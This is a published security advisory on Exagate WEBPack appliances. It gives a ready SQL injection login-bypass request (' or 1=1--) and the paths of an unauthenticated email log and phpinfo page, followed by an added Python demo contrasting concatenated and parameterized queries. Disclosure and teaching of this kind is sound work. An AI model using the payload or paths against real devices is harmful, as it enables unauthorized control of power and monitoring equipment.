Document Title:
===============
Exagate WEBpack Management System Multiple Vulnerabilities

Author:
=======
Halil Dalabasmaz

Release Date:
=============
07 OCT 2016

Product & Service Introduction:
===============================
WEBPack is the built-in web interface that provides web-based access to the main units of the SYSGuard and POWERGuard series. The software lets users build a customized dashboard for detailed monitoring and management of all power outlet sockets, sensor and volt-free contact ports, and relay outputs. User definition and authorization, remote access and update, and detailed reporting and archiving are among its features.

Vendor Homepage:
================
http://www.exagate.com/

Vulnerability Information:
==========================
Exagate ships the WEBPack Management System software on its hardware. The software is web-based and provides control over the hardware. It contains multiple vulnerabilities.

Vulnerability #1: SQL Injection
===============================
There is no filtering or validation on "login.php". The "username" and "password" parameters are vulnerable to SQL injection. A sample POST request is given below: the "password" value closes the string literal, appends an always-true condition and comments out the rest of the query, so the login check succeeds without valid credentials.

POST /login.php HTTP/1.1
Host: <TARGET HOST>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 37

username=root&password=' or 1=1--

Vulnerability #2: Unauthorized Access To Sensitive Information
==============================================================
The software can send e-mail notifications to system administrators, but there is no authorization check on the e-mail log. The log can be read anonymously at "http://<TARGET HOST>/emaillog.txt".

Vulnerability #3: Unremoved Configuration Files
===============================================
The software ships a PHP info page at the following URL. It is reachable without authentication and discloses the PHP version, build configuration, loaded modules and server environment.

http://<TARGET HOST>/api/phpinfo.php

Vulnerability Disclosure Timeline:
==================================
03 OCT 2016 - Attempted to contact vendor after discovery of vulnerabilities
06 OCT 2016 - No response from vendor; re-attempted to contact vendor
07 OCT 2016 - No response from vendor
07 OCT 2016 - Public Disclosure

Discovery Status:
=================
Published

Affected Product(s):
====================
Exagate SYSGuard 3001 (most probably all Exagate hardware running WEBPack is affected by these vulnerabilities)

Tested On:
==========
Exagate SYSGuard 3001

Disclaimer & Information:
=========================
The information provided in this advisory is provided as is, without any warranty. BGA disclaims all warranties, either expressed or implied, including the warranties of merchantability and fitness for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental or consequential loss of business profits or special damages.

Domain: www.bgasecurity.com
Social: twitter.com/bgasecurity
Contact: advisory@bga.com.tr

Copyright © 2016 | BGA Security LLC |
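The login bypass described under Vulnerability #1, reproduced as an added example that is not part of the advisory and not the vendor's code. The appliance's database engine, schema and PHP source are unknown, so the example uses an in-memory SQLite table with assumed names ("users", "username", "password") and a constructed pair of accounts; it places the advisory's payload into a query built by string concatenation, the pattern the advisory describes for "login.php", and beside it the same query with bound parameters.

```python
import sqlite3

# Constructed sample accounts standing in for the appliance's user table.
# Table and column names are assumptions; the real schema is not known.
SAMPLE_USERS = [
    (1, "root", "correct-horse"),
    (2, "operator", "batterystaple"),
]

# The "password" value from the advisory's POST request, after form decoding.
ADVISORY_PAYLOAD = "' or 1=1--"


def make_db():
    """Build the in-memory stand-in database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_login(conn, username, password):
    """Reproduces the flaw described for login.php: the submitted values are
    spliced straight into the SQL text. With the advisory's payload the query
    becomes  ... WHERE username = 'root' AND password = '' or 1=1--'
    so the closing quote is commented out and every row matches.
    Returns the username of the first matching row, or None."""
    sql = (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def safe_login(conn, username, password):
    """Same lookup with bound parameters: the payload is compared as a literal
    string and can no longer change the structure of the query."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def compare(conn):
    """Run both variants against a non-existent user with the payload and
    against the real root credential, returning the outcomes side by side."""
    return {
        "vulnerable_with_payload": vulnerable_login(conn, "nobody", ADVISORY_PAYLOAD),
        "safe_with_payload": safe_login(conn, "nobody", ADVISORY_PAYLOAD),
        "safe_with_real_credential": safe_login(conn, "root", "correct-horse"),
    }


if __name__ == "__main__":
    db = make_db()
    for label, result in compare(db).items():
        print(f"{label}: {result!r}")
```

SQLite, like MySQL and PostgreSQL, treats `--` as a comment to end of line; MySQL additionally requires whitespace after the `--`, which is why this payload is usually sent with a trailing space against MySQL-backed applications. The fix is the parameterized form, not input filtering: the advisory's payload is a legitimate string to compare against, and binding it keeps it a string.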